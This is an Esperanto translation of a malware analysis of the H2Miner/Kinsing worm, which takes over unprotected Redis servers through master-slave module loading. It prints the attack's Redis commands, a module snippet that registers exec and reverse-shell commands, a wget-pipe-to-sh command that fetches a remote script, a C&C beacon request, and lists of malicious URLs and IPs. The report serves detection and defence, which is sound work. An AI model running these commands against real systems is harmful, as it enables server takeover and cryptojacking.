Antaŭ tago, unu el la serviloj de mia projekto estis atakita de simila vermo. Serĉante respondon al la demando "kio estis tio?" Mi trovis bonegan artikolon de la teamo Alibaba Cloud Security. Ĉar mi ne trovis ĉi tiun artikolon pri Habré, mi decidis traduki ĝin speciale por vi <3
eniro
Lastatempe, la sekureca teamo de Alibaba Cloud malkovris subitan eksplodon de H2Miner. Ĉi tiu tipo de malica vermo uzas la mankon de rajtigo aŭ malfortaj pasvortoj por Redis kiel enirejoj al viaj sistemoj, post kio ĝi sinkronigas sian propran malican modulon kun la sklavo per sinkronigado de majstro-sklavo kaj fine elŝutas ĉi tiun malican modulon al la atakita maŝino kaj efektivigas malican. instrukcioj.
En la pasinteco, atakoj kontraŭ viaj sistemoj estis ĉefe faritaj per metodo implikanta planitajn taskojn aŭ SSH-ŝlosilojn, kiuj estis skribitaj al via maŝino post kiam la atakanto ensalutis en Redis. Feliĉe, ĉi tiu metodo ne povas esti uzata ofte pro problemoj kun permesa kontrolo aŭ pro malsamaj sistemversioj. Tamen, ĉi tiu metodo de ŝarĝo de malica modulo povas rekte ekzekuti la komandojn de la atakanto aŭ akiri aliron al la ŝelo, kio estas danĝera por via sistemo.
Pro la granda nombro da Redis-serviloj gastigitaj en Interreto (preskaŭ 1 miliono), la sekureca teamo de Alibaba Cloud, kiel amika memorigilo, rekomendas, ke uzantoj ne kunhavu Redis interrete kaj regule kontrolu la forton de siaj pasvortoj kaj ĉu ili estas kompromititaj. rapida elekto.
H2 Miner
H2Miner estas minindustria botneto por Linukso-bazitaj sistemoj, kiuj povas invadi vian sistemon en diversaj manieroj, inkluzive de manko de rajtigo en Hadoop-fadeno, Docker kaj Redis-malforta komanda ekzekuto (RCE) vundeblecoj. Botreto funkcias elŝutante malicajn skriptojn kaj malware por minigi viajn datumojn, vastigi la atakon horizontale kaj konservi komandan kaj kontrolan komunikadon (C&C).
Redis RCE
Scio pri ĉi tiu temo estis dividita de Pavel Toporkov ĉe ZeroNights 2018. Post versio 4.0, Redis subtenas kromprogramon de ŝarĝo, kiu donas al uzantoj la kapablon ŝargi tiel dosierojn kompilitajn per C en Redis por ekzekuti specifajn Redis-komandojn. Ĉi tiu funkcio, kvankam utila, enhavas vundeblecon en kiu, en majstra-sklava reĝimo, dosieroj povas esti sinkronigitaj kun la sklavo per plenresinkroniga reĝimo. Ĉi tio povas esti uzata de atakanto por translokigi malicajn dosierojn. Post kiam la translokigo estas finita, la atakantoj ŝarĝas la modulon sur la atakitan Redis-instancon kaj plenumas ajnan komandon.
Malware Verma Analizo
Lastatempe, la sekureca teamo Alibaba Cloud malkovris, ke la grandeco de la malica ministo grupo H2Miner subite draste pliiĝis. Laŭ la analizo, la ĝenerala procezo de atako estas kiel sekvas:
H2Miner uzas RCE Redis por plentaŭga atako. Atakantoj unue atakas senprotektajn Redis-servilojn aŭ servilojn kun malfortaj pasvortoj.
Tiam ili uzas la komandon config set dbfilename red2.so por ŝanĝi la dosiernomon. Post ĉi tio, la atakantoj plenumas la komandon slaveof por agordi la mastro-sklavan reproduktan gastigandreson.
Kiam la atakita Redis-instanco establas majstran-sklavan ligon kun la malica Redis kiu estas posedata fare de la atakanto, la atakanto sendas la infektitan modulon uzante la fullresync komandon por sinkronigi la dosierojn. La red2.so dosiero tiam estos elŝutita al la atakita maŝino. La atakantoj tiam uzas la ŝarĝan modulon ./red2.so por ŝargi ĉi tiun so-dosieron. La modulo povas efektivigi komandojn de atakanto aŭ iniciati inversan ligon (malantaŭa pordo) por akiri aliron al la atakita maŝino.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Post ekzekuto de malica komando kiel ekzemple / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, la atakanto restarigos la rezervan dosiernomon kaj malŝarĝos la sisteman modulon por purigi la spurojn. Tamen, la red2.so dosiero ankoraŭ restos sur la atakita maŝino. Uzantoj konsilas atenti la ĉeeston de tia suspektinda dosiero en la dosierujo de sia Redis-instanco.
Krom mortigi iujn malicajn procezojn por ŝteli rimedojn, la atakanto sekvis malican skripton elŝutante kaj efektivigante malicajn binarajn dosierojn por . Ĉi tio signifas, ke la proceznomo aŭ dosierujo enhavanta kinsadon sur la gastiganto povas indiki ke tiu maŝino estis infektita de ĉi tiu viruso.
Laŭ la rezultoj de inversa inĝenierado, la malware plenumas ĉefe la sekvajn funkciojn:
- Alŝuti dosierojn kaj ekzekuti ilin
- Minado
- Konservante C&C-komunikadon kaj plenumante atakantajn komandojn
Uzu masscan por ekstera skanado por pligrandigi vian influon. Krome, la IP-adreso de la C&C-servilo estas malmola kodita en la programo, kaj la atakita gastiganto komunikados kun la C&C-komunika servilo uzante HTTP-petojn, kie la informoj pri zombio (kompromisita servilo) estas identigita en la HTTP-kapo.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Aliaj atakmetodoj
Adresoj kaj ligiloj uzataj de la vermo
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s & c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Konsilo
Unue, Redis ne devus esti alirebla de la Interreto kaj devus esti protektita per forta pasvorto. Ankaŭ gravas, ke klientoj kontrolu, ke ne estas red2.so-dosiero en la dosierujo Redis kaj ke ne estas "kinsing" en la dosiero/proceza nomo sur la gastiganto.
fonto: www.habr.com